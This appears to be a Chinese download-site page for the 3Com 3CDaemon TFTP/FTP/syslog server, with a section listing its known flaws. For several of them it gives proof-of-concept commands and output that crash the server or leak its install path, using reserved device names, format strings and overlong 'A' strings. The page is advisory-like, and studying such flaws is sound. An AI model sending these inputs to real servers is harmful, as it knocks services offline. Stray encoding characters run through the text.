3COM 3CDaemon是一款多重服務器功能集成軟件�,主要作用于服務器中��,同時還能夠幫助用戶改善相關的電腦功能����,需要的用戶快來綠色資源網(wǎng)下載吧����!
3COM 3CDaemon軟件簡介:
3com的這款東西還是很有名很不錯滴~~~3CDaemon是一款免費的集成了TFTP、FTP和SYSLOG功能的應用程序��;作用于FTP,TFTP,SYSLOG服務器,TFTP客戶端����,雖然還存在很多的問題�����,但是使用起來還是不錯的��!
3COM 3CDaemon問題詳解:
1、TFTP保留設備名拒絕服務攻擊
提交類似如下的請求���,可導致TFTP服務程序掛起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2����、FTP用戶名存在格式串問題
提交包含格式串字符作為用戶名數(shù)據(jù),可導致守護程序崩潰:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3�、FTP超長用戶名緩沖區(qū)溢出
由于對用戶名缺少正確邊界緩沖區(qū)檢查,提交超長用戶名可導致緩沖區(qū)溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4�、多個FTP命令超長參數(shù)緩沖區(qū)溢出
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令對參數(shù)缺少充分邊界檢查,提交超長字符串作為命令參數(shù)可導致緩沖區(qū)溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5���、多個FTP命令存在格式串問題
提交格式字符串作為參數(shù)��,可導致程序崩潰����。
6�、多個FTP命令包設備名信息泄露問題
請求保留設備名可導致返回程序安裝路徑信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影響系統(tǒng):
3Com 3CDaemon 2.0 revision 10
網(wǎng)友評分:8 
